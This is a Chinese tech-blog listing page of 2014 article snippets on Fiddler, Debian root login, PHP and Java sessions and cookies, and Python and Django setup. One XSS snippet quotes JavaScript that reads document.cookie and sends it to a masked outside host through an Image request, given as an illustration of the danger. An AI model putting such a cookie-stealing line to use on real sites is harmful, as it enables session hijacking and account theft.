今天上网学习的时候,突然发现有这么一个工具,叫Fiddler,百度方的解释为:Fiddler是一个http协议调试代理工具,它能够记录并检查所有你的电脑和互联网之间的http通讯,设置断点,查看所有的“进出”Fiddler的数据(指cookie,html,js,css等文件,这些都可以让你胡乱修改的...
分类:
其他好文 时间:
2014-05-23 12:28:06
阅读次数:
368
Debian默认不允许root登录,所以修改之。(1)让Debian以root登录修改gdm3的登录pam文件#vi
/etc/pam.d/gdm3将auth required pam_succeed_if.so user != root quiet_success注释掉
//本行前加#重启即可(2...
分类:
其他好文 时间:
2014-05-23 12:00:51
阅读次数:
447
在PHP中使用过SESSION的朋友可能会碰到这么一个问题,SESSION变量不能跨页传递。这令我苦恼了好些日子,最终通过查资料思考并解决了这个问题。我认为,出现这个问题的原因有以下几点:
1、客户端禁用了cookie 2、浏览器出现问题,暂时无法存取cookie 3、php.ini中的sessi....
分类:
其他好文 时间:
2014-05-23 10:47:03
阅读次数:
426
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。
如下js获取cookie信息:
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src=’http://www.******.c...
分类:
其他好文 时间:
2014-05-22 08:24:14
阅读次数:
273
session
服务器用于缓存数据会话技术
默认情况:session依赖于cookie
对象HttpSession
1.session原理:
根据上图分析如下:
a.浏览器发送请求到服务器,并交给一个servlet进行处理。此时request.getSession()第一次创建session对象,将sessionId以cookie的方式发送给浏览器。同时在服务端会保存sessi...
分类:
编程语言 时间:
2014-05-22 08:08:44
阅读次数:
191
安装python2.7,安装成功会有一个python交互解释器,类似与命令窗口!但python仅是个基础库,用作web开发还远不够,因此需要装很多扩展插件!介绍个包管理器setuptools,安装方法:先下载SetupTools,然后安装,如果本机没有装python2.7的话,会报个错误,"python2.7required,b..
分类:
编程语言 时间:
2014-05-20 19:00:14
阅读次数:
334
项目名称:/cookieDemo2Record
需求:
模拟用户在网上商城,浏览商品,同时显示商品的浏览记录
1.查询所有商品页面-index.jsp/index.html
a.查询所有商品的按钮-----FindAllBooksServlet.java-com.ghsy.servlet
2.显示商城的商品
a.用bean存储商品-com.ghsy.domain
b.db包中的...
分类:
其他好文 时间:
2014-05-20 16:29:38
阅读次数:
311
web应用的会话技术:打开浏览器并访问网站,请求多个资源,关闭浏览器的过程。
在这个过程中,缓存用户数据常用的有两种技术:
1.cookie技术:用于在浏览器端,缓存用户的数据,可以理解为数据缓存在用户本地
2.session技术:用于在服务端,缓存用户的数据,可以理解为数据缓存在服务器。
cookie技术:
1.服务器需要缓存数据,将数据发给浏览器,浏览器对缓存数据进行存储;当浏览器再...
分类:
编程语言 时间:
2014-05-20 15:51:06
阅读次数:
289
在官网下载Django,这里选取Django1.6.5;进入下载路径,以我的路径为例:cd/home/user/download;解压第一步下载的压缩包:tar
-xzvf Django-1.6.5.tar.gz;进入文件夹Django-1.6.5,执行setup.py安装文件:python set...
分类:
其他好文 时间:
2014-05-20 09:24:43
阅读次数:
246
准备用Django开发网站,豆瓣阅读中有《Django入门》,里面有人批注说用virtualenv+pip很好。每次搞个什么都感觉举步维艰,因为之前太懒了,什么都懒得深入看一下。pip一直用,但是就是搞不清楚和apt-get,
easy_install, setuptools有什么区别。所以说,很多...
分类:
其他好文 时间:
2014-05-20 08:58:52
阅读次数:
312
